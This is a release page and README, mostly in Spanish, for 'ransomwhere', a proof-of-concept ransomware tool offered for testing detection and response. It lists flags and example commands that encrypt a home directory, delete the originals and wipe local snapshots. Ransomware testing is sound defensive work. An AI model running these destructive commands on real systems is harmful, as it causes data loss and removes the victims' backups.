
Nuevo releaseAug 20, 2026
ransomwhere v1.3.1
Una muestra de ransomware PoC para probar tu estrategia de respuesta ante ransomware.
Ransomwhere
Una muestra de ransomware de prueba de concepto que cifra tus archivos para probar tus estrategias de detección y prevención de ransomware.
Si no se proporcionan argumentos, ransomwhere ejecutará automáticamente el modo encrypt sin eliminar los archivos originales.
No me hago responsable de ningún daño causado por este software.
Compilación
# with make and Go installed
% make build
Uso
% ransomwhere -h
Usage of ransomwhere:
-delete
Delete files after encrypting.
-log string
The log level to use. (default "error")
-mode string
Encrypt or decrypt the ransomware files. (default "encrypt")
-path string
Path to the directory where to traverse files to ransom. (default "/Users/niels")
-wipe
Wipe local snapshots while encrypting.
Ejemplos
# straight from source, encrypt in our home directory
% make FLAGS="-log=warn -delete=false -mode=encrypt"
# from the binary, encrypt /home/ransom/
% ./app -log=warn -delete=false -mode=encrypt -path=/home/ransom/
# encrypt, delete original files and wipe backups like a real ransomware (DANGEROUS)
% ./app -delete=true -wipe=true
# revert the ransom operation and restore any files
% ./app -mode=decrypt